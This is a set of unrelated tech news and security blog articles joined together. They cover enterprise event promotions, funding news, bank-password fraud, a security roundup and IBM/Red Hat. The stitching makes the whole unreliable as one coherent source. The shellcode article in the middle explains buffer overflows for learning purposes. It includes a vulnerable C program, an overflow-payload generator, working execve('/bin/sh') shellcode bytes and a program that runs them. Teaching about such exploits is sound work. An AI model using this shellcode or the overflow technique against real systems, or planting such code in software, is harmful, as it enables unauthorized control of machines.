Quantum computing is coming to TC Sessions: Enterprise on Sept. 5

Here at TechCrunch, we like to think about what’s next, and there are few technologies quite as exotic and futuristic as quantum computing. After what felt like decades of being “almost there,” we now have working quantum computers that are able to run basic algorithms, even if only for a very short time. As those times increase, we’ll slowly but surely get to the point where we can realize the full potential of quantum computing.

For our TechCrunch Sessions: Enterprise event in San Francisco on September 5, we’re bringing together some of the sharpest minds from some of the leading companies in quantum computing to talk about what this technology will mean for enterprises (p.s. early-bird ticket sales end this Friday). This could, after all, be one of those technologies where early movers will gain a massive advantage over their competitors. But how do you prepare yourself for this future today, while many aspects of quantum computing are still in development?

IBM’s quantum computer demonstrated at Disrupt SF 2018

Joining us onstage will be Microsoft’s Krysta Svore, who leads the company’s Quantum efforts; IBM’s Jay Gambetta, the principal theoretical scientist behind IBM’s quantum computing effort; and Jim Clarke, the director of quantum hardware at Intel Labs.

That’s pretty much a Who’s Who of the current state of quantum computing, even though all of these companies are at different stages of their quantum journey. IBM already has working quantum computers, Intel has built a quantum processor and is investing heavily in the technology, and Microsoft is taking a very different approach that may lead to a breakthrough in the long run but that currently keeps it from having a working machine. In the meantime, though, Microsoft has invested heavily in building the software tools for writing quantum applications.

During the panel, we’ll discuss the current state of the industry, where quantum computing can already help enterprises today and what they can do to prepare for the future. The implications of this new technology also go well beyond faster computing (for some use cases); there are also the security issues that will arise once quantum computers become widely available and current encryption methodologies become easily breakable.

The early-bird ticket discount ends this Friday, August 9. Be sure to grab your tickets to get the max $100 savings before prices go up. If you’re a startup in the enterprise space, we still have some startup demo tables available! Each demo table comes with four tickets to the show and a high-visibility exhibit space to showcase your company to attendees — learn more here.

CircleCI brings its continuous integration to Microsoft programmers for first time

CircleCI has been supporting continuous integration for Linux and Mac programmers for some time, but up until today, Microsoft developers have been left on the outside looking in. Today, the company changed that, announcing new support for Microsoft programmers using Windows Server 2019.

CircleCI, which announced a $56 million Series D investment last month, is surely looking for ways to expand its market reach, and providing support for Microsoft programmers is a good place to start, as it represents a huge untapped market for the company.

“We’re really happy to announce that we are going to support Windows because customers are asking for it. Windows [comprises] 40% of the development market, according to a Stack Overflow survey from earlier this year,” Alexey Klochay, CircleCI product manager for Windows, told TechCrunch.

Microsoft programmers could use continuous integration outside of CircleCI before, but it was much harder. Klochay says that with CircleCI, they are getting a much more integrated solution. For starters, he says, developers can get up and running right away without the help of an engineer. “We give the power to developers to do exactly what they need to do at their own pace without getting locked into anything. We’re providing ease of use and ease of maintenance,” he explained.

CircleCI also provides greater visibility across a development team. “We are also giving companies tools to get better visibility into what everyone is building, and how everyone is interacting with the system,” he said.

Klochay says that much of this is possible because of the changes in Windows Server 2019, which was released last year. “Because of all the changes that Microsoft has been introducing in the latest Windows Server, it has been a smoother experience than if we had to start a year ago,” he said.

Nathan Dintenfass from CircleCI says that in general, the Microsoft ecosystem has shifted in recent years to be more welcoming to the kind of approach that CircleCI provides for developers. “We have observed a maturation of the Windows ecosystem, and being more and more attracted to the kinds of teams that are investing in really high-throughput software delivery automation, while at the same time a maturation of the underlying cloud infrastructure that makes Windows available, and makes it much easier for us to operate,” he explained.

Malicious Input: How Hackers Use Shellcode

It’s Black Hat 2019 this week, with Def Con following hard on its heels. Even if you’re not going to either of these events, if you have a stake in the world of cybersecurity your social media feeds are going to be filled with plenty of “hacker talk” over the next seven days or so. Of course, you know all about hashes in cybersecurity and how to decode Base64; you’re likely also familiar with steganography, and maybe you can even recite the history of cybersecurity and the development of EDR. But how about explaining the malicious use of shellcode? You know it has nothing to do with shell scripts or shell scripting languages like Bash, but can you hold your own talking about what shellcode really is, and why it’s such a great tool for attackers?


Not sure? No problem. We’ve got just the post for you. In the next ten minutes, we’ll take you through the basics of shellcode, what it is, how it works and how hackers use it as malicious input.

What is Shellcode?

We know shellcode has nothing to do with shell scripting, so why the name? The connection with the shell is that shellcode was originally mainly used to open or ‘pop’ a shell – that is, an instance of a command line interpreter – so that an attacker could use the shell as a means to compromise the system. Imagine if you could get a user to feed a seemingly innocent string to a legitimate program on their system and have it magically open a reverse shell back to your machine. That’s the ultimate pwning prize. It also takes very little code to spawn a new process that will give a shell, so popping shells is a very lightweight, efficient means of attack.

In order to achieve it, you’d need to find an exploitable program and fashion some malicious input string – the shellcode – containing small chunks of executable code to force the program into popping a shell. This is possible because most programs, in order to be useful, need the ability to receive input: to read strings and other data supplied by the user or piped in from another program.

Shellcode exploits this requirement by containing instructions telling the program to do something it otherwise wouldn’t or shouldn’t. Of course, almost no program is going to easily misinterpret data as code without a bit of persuasion. Programs are designed to take in data only of a certain type – numbers, strings, dates and such like – and anything else of a different type will just be rejected. However, we can trick programs into treating specially-formatted strings, aka “shellcode”, as program instructions by means of another hacking conversation favorite: the buffer overflow.

What is a Buffer Overflow?

A buffer overflow occurs when a program writes data into memory that is larger than the buffer – the area of memory the program has reserved for it. This is a programming error, as code should always check first that the length of any input data will not exceed the size of the buffer that’s been allocated. When this happens the program may crash, but maliciously crafted input may instead allow an attacker to execute their own code when it overflows into an area of executable memory. Here’s a simple example of a buffer overflow waiting to happen.

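A minimal sketch of the kind of program being described (the prompt and the particular input function here are illustrative choices, not taken from the original example):

#include <stdio.h>

int main(void) {
    char buffer[16];

    printf("Enter your name: ");
    /* %s places no limit on how much input is copied into buffer,
       so anything longer than the 16-byte buffer overwrites adjacent memory. */
    scanf("%s", buffer);
    printf("Hello, %s\n", buffer);
    return 0;
}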

The program reserves 16 bytes of memory for the input, but the size of the input is never checked. If the user enters a string longer than 16 bytes, the data will overwrite adjacent memory – a buffer overflow. The image below shows what happens if you try to execute the above program and supply it with input greater than 16 bytes:

[Image: crash report produced by running the program above with oversized input]

However, just causing a buffer overflow in a program isn’t on its own much use to attackers, unless all they want to do is bring the application to a crashing halt. While that would represent a win of sorts for attackers whose objective is some kind of denial of service attack, the greater prize in most cases is not just causing the overflow but using it as a means to take control of execution. Once this is achieved, the target device can fall under the hacker’s complete control.

Controlling Code Execution

When we create a buffer overflow, the aim is to write a sufficiently large amount of data into the program’s memory so that two things happen. First, we fill up the allocated buffer, and second, we supply enough extra data to overwrite the address of the code that will be executed next with a value of our choosing.

This isn’t simple, but it might sound harder to do than it actually is. Because of the nature of how program memory is mapped out, when any function is called, there’s always a pointer held in memory to the address of the instruction that should be executed once the current function returns; this pointer is known as the Instruction Pointer, sometimes referred to as EIP (32-bit) or RIP (64-bit). I’ll use RIP throughout the rest of this post, but the same observations apply to EIP.

By reverse engineering a particular program and with a lot of fuzzing and experimenting, we can determine both whether a given program contains any functions that are vulnerable to a buffer overflow and, if so, the address of the Instruction Pointer when that vulnerable function returns.

Knowing the offset – the memory address – of the Instruction Pointer at that point in the code means we can determine precisely how much extra data we need to overflow the buffer and overwrite the Instruction Pointer with a value of our own. When we do that, the program will try to execute whatever sits at the address we’ve written into the RIP register. If that address is junk, like in the example above, the program will crash, but if it isn’t – if it points to valid code – things start to get more interesting.
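As a rough sketch of what this looks like in practice (the offsets and the target address below are invented purely for illustration; real values have to be found by fuzzing and inspecting crashes in a debugger), an attacker might generate the overflowing input with a small helper program and pipe its output into the vulnerable binary:

#include <stdio.h>
#include <string.h>

int main(void) {
    /* Hypothetical layout: 16-byte buffer plus 8 bytes of saved state
       before the saved return address that will be loaded into RIP. */
    unsigned char payload[32];
    unsigned long fake_return = 0x0000000000401196UL; /* invented target address */

    memset(payload, 'A', 24);                     /* filler to reach the saved address */
    memcpy(payload + 24, &fake_return, 8);        /* overwrite it, in native byte order */
    fwrite(payload, 1, sizeof(payload), stdout);  /* pipe this into the vulnerable program */
    return 0;
}

Feeding this helper’s output into the vulnerable program is what turns a simple crash into a controlled redirect of execution.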

From Buffer Overflow to Shellcode

Having achieved a buffer overflow and mapped out the memory addresses and offsets, the attacker has two options. Either the malicious input could write the address of another function of the program to RIP or the attacker could try to jump to an address in which attack code has already been inserted.

The first case may often be all that is needed. Suppose the program contains a function that is normally only reached if the user is authorized to take that action. In such a case, the attacker can use the buffer overflow to write the address of that function directly into the Instruction Pointer, bypassing any earlier function that would have checked for authorization.

The second scenario is far more tricky. Suppose I want the program to do something it’s not programmed to do, like open up a shell? In that case, I need to overflow the buffer not just with junk or an address to jump to, but with executable code – shellcode – as well as the address of where that code begins.

How To Create Shellcode

Now that we understand the mechanism that shellcode exploits, how do we go about creating it? As we saw already, we need to send executable code in the input data, but we can’t just write a bunch of C or C++ instructions into the input.

If we want the program to write executable instructions into memory, then we need to send it raw assembly code in our string. However, there’s a difficulty.

When C-like programs read strings – an array of chars – from user input, they need to know when the input has come to an end. Character strings in C are terminated by appending a special null-byte character to the end of the character array. This null-byte character has the value of zero. It is represented by \x00 in shellcode and 00 in hex. When the program encounters the null-byte character, signalling the end of the string, it will cease reading further input and move on to the next instruction in its code.

And herein lies the difficulty: the string-terminating null-byte character has the value of zero, but it is not the same thing as the integer 0. However, they both share the same hex value, 00, and are thus represented in shellcode the same way, as \x00.

That means we cannot pass the integer 0 directly in our shellcode, as any \x00 will be interpreted by the program as a null-byte character and signal the end of input. As a result, the rest of our code after the \x00 will be discarded.
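A quick, hypothetical illustration of why an embedded null byte is fatal to string-delivered shellcode:

#include <stdio.h>
#include <string.h>

int main(void) {
    /* The two literals are concatenated; the byte after "AAAA" is \x00. */
    char input[] = "AAAA\x00" "BBBB";

    printf("%zu\n", strlen(input)); /* prints 4 -- string functions stop at the null byte */

    char copy[16];
    strcpy(copy, input);            /* copies only "AAAA"; the "BBBB" part never arrives */
    printf("%s\n", copy);           /* prints AAAA */
    return 0;
}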

In order to solve this problem and create well-formed shellcode, we need to go through several steps.

1. Create the program we want to execute in a high-level language like C. As it has to fit in a small amount of memory – the size of the buffer plus the offset to RIP – it should be as concise as possible. The shellcode used in this example, which spawns a shell via execve, is a mere 23 bytes.
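For instance, a minimal version of such a program (a sketch along the lines of the execve example just described, with error handling omitted for brevity) could be as simple as:

#include <unistd.h>

int main(void) {
    char *argv[] = { "/bin/sh", NULL };

    /* Replace the current process image with a shell; the hand-written
       assembly equivalent of this one call is what becomes the shellcode. */
    execve("/bin/sh", argv, NULL);
    return 0;
}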

2. After compiling the code and checking that it does what we expect, use a disassembler to view the raw assembly.

[Image: disassembly of the compiled program, showing memory addresses, hex opcodes and operands, and the corresponding assembly]

3. Optimize the assembly, such as replacing any 00 hex with other instructions. In the image above, the first column (left of the colon) shows us the memory address, the second column shows us the opcodes and operands (program instructions) in hex, and the remaining columns on the right show us the same in a human-readable language.

This code has already been optimized. Notice at line 8 the hexadecimal 48 31 f6, which represents the instructions for the following assembly:

xor %rsi, %rsi

The use of XOR here is an example of sidestepping the restriction on using the hex byte 00 that we mentioned above. This particular program needs to push the integer 0 onto the stack. To do so, it first loads 0 into the %rsi register. The natural way to do that would be:

mov $0x0, %rsi

But that would produce the hex 00 to represent $0x0. We can get around that by XORing the %rsi register with itself. When both inputs to XOR are the same the result is 0, so this instruction leaves 0 in %rsi but doesn’t require a 00 anywhere in the machine code (the opcode for XOR is 0x31 on Intel 32-bit and 64-bit architectures).

4. Next, we need to extract the hexadecimal program instructions and create a shellcode string. To do that we prefix each hex byte with \x and concatenate them all as a single string.

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

5. Finally, we can now feed our shellcode to a vulnerable program, or create our own and convince a user to execute it, like this one.

[Image: example program carrying the shellcode]
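A common pattern for such a carrier program (sketched here using the shellcode string from step 4, and assuming the bytes can be placed in executable memory) is to embed the bytes and jump to them directly:

/* The 23-byte execve("/bin//sh") shellcode string from step 4 above. */
unsigned char shellcode[] =
    "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
    "\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";

int main(void) {
    /* Treat the byte string as code and call it. On modern systems this only
       works if the bytes live in executable memory, for example by compiling
       with an executable stack/data segment (gcc -z execstack on older
       toolchains) or by copying them into a page mapped with PROT_EXEC. */
    void (*run)(void) = (void (*)(void))shellcode;
    run();
    return 0;
}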

Some other great examples of this process can be seen here.

Protecting Against Shellcode

You would think that buffer overflows, which have been known about for decades, should be becoming rarer, but in fact the opposite is true. Statistics from the CVE database at NIST show that vulnerabilities caused by buffer overflows increased dramatically during 2017 and 2018. The number known for this year is already higher than every year from 2010 to 2016, and we still have almost 5 months of the year left to go.

[Image: CVE statistics showing buffer overflow vulnerabilities by year]

Clearly, there’s a lot of unsafe code out there, and the only real way you can protect yourself from exploits that inject shellcode into vulnerable programs is with a multi-layered security solution that can not only use Firewall or Device controls to protect your software stack from unwanted connections, but that also uses static and behavioral AI to catch malicious activity both before and on execution. With a comprehensive security solution that uses machine learning to identify malicious behavior, attacks by shellcode are seen just like any other attack and stopped before they can do any damage.

Conclusion

In this post, we’ve taken a look at what shellcode is and how hackers can use it as malicious input to exploit vulnerabilities in legitimate programs. Despite the long history of the dangers of buffer overflows, even today we see an increasing number of CVEs being attributed to this vector. Looking on the bright side, attacks that utilize shellcode can be stopped with a good security solution. On top of that, if you find yourself in the midst of a thread or a chat concerning shellcode and malicious input, you should now be able to participate and see what more you can learn from, or share with, others!



Four days left for early-bird tickets to TC Sessions: Enterprise 2019

We’re just one month away from TC Sessions: Enterprise, which takes place on September 5 at the Yerba Buena Center in San Francisco. But you have only four days left to score an early-bird ticket and save yourself $100. Right now, you pay $249, but once the clock strikes 11:59 p.m. (PT) on August 9, the bird flies south and the price flies north. Get your early-bird ticket today and save.

Focused on the current and future state of enterprise software, this day-long conference offers tremendous value — even at full price. Considering the rate at which this $500 billion industry acquires startups — and how quickly it’s evolving — TC Sessions: Enterprise makes perfect sense for enterprise-minded founders, investors, CTOs, CIOs, engineers and MBA students (student tickets cost $75).

We’ve packed the conference with interviews, panel discussions, Q&As and breakout sessions. TechCrunch editors will dig deep to separate hype from reality as they explore crucial issues, complex technologies and investment trends with both industry giants and up-and-coming startups.

Here’s a sample of just some of what we have planned. You can also check out the agenda — and we might add a few surprises along the way.

Curious about the latest in enterprise investment? TechCrunch editor Connie Loizos will interview VCs Jason Green, founder and general partner at Emergence; Maha Ibrahim, general partner at Canaan Partners; and Rebecca Lynn, co-founder and general partner at Canvas Ventures. They’ll examine trends in early-stage enterprise investments and discuss different sectors and companies that have their attention.

Maybe you want to learn from a founder who’s been there and done that. Don’t miss Aaron Levie, Box co-founder, chairman and CEO, as he outlines what it took to travel the entire startup journey. He’ll also offer his take on the future of data platforms.

Want to cover more ground at TC Sessions: Enterprise? Take advantage of our group discount and bring the whole team. Buy four or more tickets at once and save 20%. Don’t forget: For every ticket you buy to TC Sessions: Enterprise, we’ll register you for a free Expo Only pass to TechCrunch Disrupt SF on October 2-4.

TC Sessions: Enterprise takes place on September 5, but your chance to save $100 ends in just four short days. Don’t wait — buy an early-bird ticket today, and we’ll see you in September!

Is your company interested in sponsoring or exhibiting at TC Sessions: Enterprise? Contact our sponsorship sales team by filling out this form.

Cockroach Labs announces $55M Series C to battle industry giants

Cockroach Labs, makers of CockroachDB, sits in a tough position in the database market. On one side, it has traditional database vendors like Oracle, and on the other there’s AWS and its family of databases. It takes some good technology and serious dollars to compete with those companies. Cockroach took care of the latter with a $55 million Series C round today.

The round was led by Altimeter Capital and Tiger Global along with existing investor GV. Other existing investors including Benchmark, Index Ventures, Redpoint Ventures, FirstMark Capital and Work-Bench also participated. Today’s investment brings the total raised to over $110 million, according to the company.

Spencer Kimball, co-founder and CEO, says the company is building a modern database to compete with these industry giants. “CockroachDB is architected from the ground up as a cloud native database. Fundamentally, what that means is that it’s distributed, not just across nodes in a single data center, which is really table stakes as the database gets bigger, but also across data centers to be resilient. It’s also distributed potentially across the planet in order to give a global customer base what feels like a local experience to keep the data near them,” Kimball explained.

At the same time, even while it has a cloud product hosted on AWS, it also competes with several AWS database products including Amazon Aurora, Redshift and DynamoDB. Much like MongoDB, which changed its open source licensing structure last year, Cockroach did as well, for many of the same reasons. They both believed bigger players were taking advantage of the open source nature of their products to undermine their markets.

“If you’re trying to build a business around an open source product, you have to be careful that a much bigger player doesn’t come along and extract too much of the value out of the open source product that you’ve been building and maintaining,” Kimball explained.

As the company deals with all of these competitive pressures, it takes a fair bit of money to continue building a piece of technology to beat the competition, while going up against much deeper-pocketed rivals. So far the company has been doing well, with Q1 revenue this year doubling all of last year’s. Kimball indicated that Q2 could double Q1, but he wants to keep that going, and that takes money.

“We need to accelerate that sales momentum and that’s usually what the Series C is about. Fundamentally, we have, I think, the most advanced capabilities in the market right now. Certainly we do if you look at the differentiator around just global capability. We nevertheless are competing with Oracle on one side, and Amazon on the other side. So a lot of this money is going towards product development too,” he said.

Cockroach Labs was founded in 2015, and is based in New York City.

Segment CEO Peter Reinhardt is coming to TechCrunch Sessions: Enterprise to discuss customer experience management

There are few topics as hot right now in the enterprise as customer experience management, that ability to collect detailed data about your customers, then deliver customized experiences based on what you have learned about them. To help understand the challenges companies face building this kind of experience, we are bringing Segment CEO Peter Reinhardt to TechCrunch Sessions: Enterprise on September 5 in San Francisco (p.s. early-bird sales end this Friday, August 9).

At the root of customer experience management is data — tons and tons of data. It may come from the customer journey through a website or app, basic information you know about the customer or the customer’s transaction history. It’s hundreds of signals, and collecting that data in order to build the experience is where Reinhardt’s company comes in.

Segment wants to provide the infrastructure to collect and understand all of that data. Once you have that in place, you can build data models and then develop applications that make use of the data to drive a better experience.

Reinhardt, and a panel that includes Qualtrics’ Julie Larson-Green and Adobe’s Amit Ahuja, will discuss with TechCrunch editors the difficulties companies face collecting all of that data to build a picture of the customer, then using it to deliver more meaningful experiences for them. See the full agenda here.

Segment was born in the proverbial dorm room at MIT when Reinhardt and his co-founders were students there. They have raised more than $280 million since inception. Customers include Atlassian, Bonobos, Instacart, Levis and Intuit.

Early-bird tickets to see Peter and our lineup of enterprise influencers at TC Sessions: Enterprise are on sale for just $249 when you book here; but hurry, prices go up by $100 after this Friday!

Are you an early-stage startup in the enterprise-tech space? Book a demo table for $2,000 and get in front of TechCrunch editors and future customers/investors. Each demo table comes with four tickets to enjoy the show.

The Risk of Weak Online Banking Passwords

If you bank online and choose weak or re-used passwords, there’s a decent chance your account could be pilfered by cyberthieves — even if your bank offers multi-factor authentication as part of its login process. This story is about how crooks increasingly are abusing third-party financial aggregation services like Mint, Plaid, Yodlee, YNAB and others to surveil and drain consumer accounts online.

Crooks are constantly probing bank Web sites for customer accounts protected by weak or recycled passwords. Most often, the attacker will use lists of email addresses and passwords stolen en masse from hacked sites and then try those same credentials to see if they permit online access to accounts at a range of banks.

A screenshot of a password-checking tool being used to target Chase Bank customers who re-use passwords from other sites. Image: Hold Security.

From there, thieves can take the list of successful logins and feed them into apps that rely on application programming interfaces (APIs) from one of several personal financial data aggregators which help users track their balances, budgets and spending across multiple banks.

A number of banks that do offer customers multi-factor authentication — such as a one-time code sent via text message or an app — have chosen to allow these aggregators the ability to view balances and recent transactions without requiring that the aggregator service supply that second factor. That’s according to Brian Costello, vice president of data strategy at Yodlee, one of the largest financial aggregator platforms.

Costello said while some banks have implemented processes which pass through multi-factor authentication (MFA) prompts when consumers wish to link aggregation services, many have not.

“Because we have become something of a known quantity with the banks, we’ve set up turning off MFA with many of them,” Costello said.  “Many of them are substituting coming from a Yodlee IP or agent as a factor because banks have historically been relying on our security posture to help them out.”

Such reconnaissance helps lay the groundwork for further attacks: If the thieves are able to access a bank account via an aggregator service or API, they can view the customer’s balance(s) and decide which customers are worthy of further targeting.

This targeting can occur in at least one of two ways. The first involves spear phishing attacks to gain access to that second authentication factor, which can be made much more convincing once the attackers have access to specific details about the customer’s account — such as recent transactions or account numbers (even partial account numbers).

The second is through an unauthorized SIM swap, a form of fraud in which scammers bribe or trick employees at mobile phone stores into seizing control of the target’s phone number and diverting all texts and phone calls to the attacker’s mobile device.

But beyond targeting customers for outright account takeovers, the data available via financial aggregators enables a far more insidious type of fraud: The ability to link the target’s bank account(s) to other accounts that the attackers control.

That’s because PayPal, Zelle, and a number of other pure-play online financial institutions allow customers to link accounts by verifying the value of microdeposits. For example, if you wish to be able to transfer funds between PayPal and a bank account, the company will first send a couple of tiny deposits  — a few cents, usually — to the account you wish to link. Only after verifying those exact amounts will the account-linking request be granted.

Alex Holden is founder and chief technology officer of Hold Security, a Milwaukee-based security consultancy. Holden and his team closely monitor the cybercrime forums, and he said the company has seen a number of cybercriminals discussing how the financial aggregators are useful for targeting potential victims.

Holden said it’s not uncommon for thieves in these communities to resell access to bank account balance and transaction information to other crooks who specialize in cashing out such information.

“The price for these details is often very cheap, just a fraction of the monetary value in the account, because they’re not selling ‘final’ access to the account,” Holden said. “If the account is active, hackers then can go to the next stage for 2FA phishing or social engineering, or linking the accounts with another.”

Currently, the major aggregators and/or applications that use those platforms store bank logins and interactively log in to consumer accounts to periodically sync transaction data. But most of the financial aggregator platforms are slowly shifting toward using the OAuth standard for logins, which can give banks a greater ability to enforce their own fraud detection and transaction scoring systems when aggregator systems and apps are initially linked to a bank account.

That’s according to Don Cardinal, managing director of the Financial Data Exchange (FDX), which is seeking to unite the financial industry around a common, interoperable, and royalty-free standard for secure consumer and business access to their financial data.

“This is where we’re going,” Cardinal said. “The way it works today, you the aggregator or app stores the credentials encrypted and presents them to the bank. What we’re moving to is [an account linking process] that interactively loads the bank’s Web site, you login there, and the site gives the aggregator an OAuth token. In that token granting process, all the bank’s fraud controls are then direct to the consumer.”

Alissa Knight, a senior analyst with the Aite Group, a financial and technology analyst firm, said such attacks highlight the need to get rid of passwords altogether. But until such time, she said, more consumers should take full advantage of the strongest multi-factor authentication option offered by their bank(s), and consider using a password manager, which helps users pick and remember strong and unique passwords for each Web site.

“This is just more empirical data around the fact that passwords just need to go away,” Knight said. “For now, all the standard precautions we’ve been giving consumers for years still stand: Pick strong passwords, avoid re-using passwords, and get a password manager.”

Some of the most popular password managers include 1Password, Dashlane, LastPass and Keepass. Wired.com recently published a worthwhile writeup which breaks down each of these based on price, features and usability.

Mesosphere changes name to D2IQ, shifts focus to Kubernetes, cloud native

Mesosphere was born as the commercial face of the open source Mesos project. It was surely a clever solution to make virtual machines run much more efficiently, but times change and companies change. Today the company announced it was changing its name to Day2IQ or D2IQ for short, and fixing its sights on Kubernetes and cloud native, which have grown quickly in the years since Mesos appeared on the scene.

D2IQ CEO Mike Fey says that the name reflects the company’s new approach. Instead of focusing entirely on the Mesos project, it wants to concentrate on helping more mature organizations adopt cloud native technologies.

“We felt like the Mesosphere name was somewhat constrictive. It made statements about the company that really allocated us to a given technology, instead of to our core mission, which is supporting successful Day Two operations, making cloud native a viable approach not just for the early adopters, but for everybody,” Fey explained.

Fey is careful to point out that the company will continue to support the Mesos-driven DC/OS solution, but the general focus of the company has shifted, and the new name is meant to illustrate that. “The Mesos product line is still doing well, and there are things that it does that nothing else can deliver on yet. So we’re not abandoning that totally, but we do see that Kubernetes is very powerful, and the community behind it is amazing, and we want to be a value added member of that community,” he said.

He adds that this is not about jumping on the cloud native bandwagon all of a sudden. He points out his company has had a Kubernetes product for more than a year running on top of DC/OS, and it has been a contributing member to the cloud native community.

It’s not just about a name change and refocusing the company and the brand; it also involves several new cloud native products that the company has built to serve the type of audience the new name was inspired by: the more mature organization.

For starters, it’s introducing its own flavor of Kubernetes called Konvoy, which it says provides an “enterprise-grade Kubernetes experience.” The company will also provide a support and training layer, which it believes is a key missing piece, and one that is required by larger organizations looking to move to cloud native.

In addition, it is offering a data integration layer, which is designed to help integrate large amounts of data in a cloud-native fashion. To that end, it is introducing a beta of Kudo, an open source cloud-native tool for building stateful operations in Kubernetes. The company has already donated this tool to the Cloud Native Computing Foundation, the open source organization that houses Kubernetes and other cloud native projects.

The company faces stiff competition in this space from some heavy hitters like the newly combined IBM and Red Hat, but it believes by adhering to a strong open source ethos, it can move beyond its Mesos roots to become a player in the cloud native space. Time will tell if it made a good bet.

The Good, the Bad and the Ugly in Cybersecurity – Week 31

The Good

After 8 years of waiting, corporate whistleblower James Glen finally received a settlement this week from Cisco Systems, who were found to have made false claims regarding video surveillance software the tech giant sold to US government buyers including Los Angeles International Airport, Washington D.C. police and the US Army, Navy, Air Force and Marine Corps. Glen exposed vulnerabilities in Cisco’s Video Surveillance Manager which could allow hackers to compromise an organization’s entire network. Despite being told of the vulnerabilities in 2008, Cisco failed to fix the flaws until 2013 and had continued to ship the flawed software to government buyers in the meantime. The company was handed a fine in excess of US $8m for the lawsuit filed in 2011. The case is believed to be the first successful prosecution of a cybersecurity company under the False Claims Act. Industry watchers believe it may serve as a precedent and open the way to further similar lawsuits against cybersecurity vendors peddling products with known vulnerabilities.

More good news for privacy watchdogs this week as Apple announced that it would halt the practice of using human contractors to listen in to user Siri recordings. The practice had been revealed last Friday by a British newspaper. Citing contractors who had undertaken the work for Apple, the newspaper revealed that staff regularly heard snippets of confidential conversations that Siri had inadvertently picked up. Apple now say they have suspended the practice and are conducting “a thorough review”. Good to see Apple move on this in an uncharacteristically speedy and transparent fashion. 

The Bad

The big, bad news story of the week is, of course, the Capital One leak of over 100 million consumer records by ex-Amazon employee-turned-hacker Paige A. Thompson. Since our report on Wednesday, further claims are emerging that Thompson, known online by her handle ‘erratic’, may have compromised other organizations aside from Capital One. These could possibly include Ford, InfoBlox, UniCredit, and the Ohio Department of Transportation. Interestingly, and perhaps reassuringly for Amazon if true (given the hack could undermine a lucrative Pentagon contract), the Ohio DoT is not an AWS customer.

In related news, CEOs beware as politicians try to use the incident to win backing for a bill that would see business leaders jailed for data breaches.

image of ron wyden tweet

The warnings keep coming – Microsoft (twice), Homeland Security and the NSA have each issued separate advisories in the last few months – but reports suggest that the BlueKeep vulnerability still remains largely unpatched. Have organizations really learned nothing since EternalBlue, WannaCry and NotPetya? Now, Metasploit developers Rapid7 say they’re observing a significant increase in malicious RDP (Remote Desktop Protocol) activity, suggesting attackers are stepping up scans for vulnerable devices.

[Image: chart of malicious RDP activity observed by Rapid7]

Rapid7 are also readying a Metasploit exploit module for BlueKeep to “help defenders and penetration testers demonstrate and validate risk”. Aside from the nearly 1m devices vulnerable to the wormable BlueKeep vulnerability that are exposed on the public internet, security researchers point out that this number does not take into account the unknown number of vulnerable devices on internal networks. Is your organization prepared for the first BlueKeep-powered ransomware?

The Ugly

It’s curious how privacy problems keep coming back to bite Apple, despite their public positioning as the company that takes user privacy seriously. We’ve spoken before on the dangers of Bluetooth, but now researchers have found that Apple’s Bluetooth LE protocol used in recent versions of iOS is leaking data to anyone close enough to listen in on it. Exposed data includes the current status of the device, device name, Wi-Fi status, battery info and, in some circumstances, possibly even the cell phone number.

[Image: Apple privacy poster]

New cybersecurity laws in China are set to hit US tech firms as Beijing looks to increase regulation on network equipment, data storage and ‘critical information infrastructure’ procured from overseas companies. Cisco and Dell, among others, could find it increasingly difficult or expensive to do business in mainland China, particularly as the exact nature of the cybersecurity laws appears to be deliberately vague while the US and China remain locked in a tit-for-tat trade war. Some suggest that China’s new cybersecurity laws may be more or less draconian for US companies depending on how things shake out in the current spat over tariffs.



With the acquisition closed, IBM goes all in on Red Hat

IBM’s massive $34 billion acquisition of Red Hat closed a few weeks ago and today, the two companies are announcing the first fruits of this process. For the most part, today’s announcement furthers IBM’s ambitions to bring its products to any public and private cloud. That was very much the reason why IBM acquired Red Hat in the first place, of course, so this doesn’t come as a major surprise, though most industry watchers probably didn’t expect this to happen this fast.

Specifically, IBM is announcing that it is bringing its software portfolio to Red Hat OpenShift, Red Hat’s Kubernetes-based container platform that is essentially available on any cloud that allows its customers to run Red Hat Enterprise Linux.

In total, IBM has already optimized more than 100 products for OpenShift and bundled them into what it calls “Cloud Paks.” There are currently five of these Paks: Cloud Pak for Data, Application, Integration, Automation and Multicloud Management. These technologies, which IBM’s customers can now run on AWS, Azure, Google Cloud Platform or IBM’s own cloud, among others, include DB2, WebSphere, API Connect, Watson Studio and Cognos Analytics.

“Red Hat is unlocking innovation with Linux-based technologies, including containers and Kubernetes, which have become the fundamental building blocks of hybrid cloud environments,” said Jim Whitehurst, president and CEO of Red Hat, in today’s announcement. “This open hybrid cloud foundation is what enables the vision of any app, anywhere, anytime. Combined with IBM’s strong industry expertise and supported by a vast ecosystem of passionate developers and partners, customers can create modern apps with the technologies of their choice and the flexibility to deploy in the best environment for the app – whether that is on-premises or across multiple public clouds.”

IBM argues that a lot of the early innovation on the cloud was about bringing modern, customer-facing applications to market, with a focus on basic cloud infrastructure. Now, however, enterprises are looking at how they can take their mission-critical applications to the cloud, too. For that, they want access to an open stack that works across clouds.

In addition, IBM also today announced the launch of a fully managed Red Hat OpenShift service on its own public cloud, as well as OpenShift on IBM Systems, including the IBM Z and LinuxONE mainframes, and the launch of its new Red Hat consulting and technology services.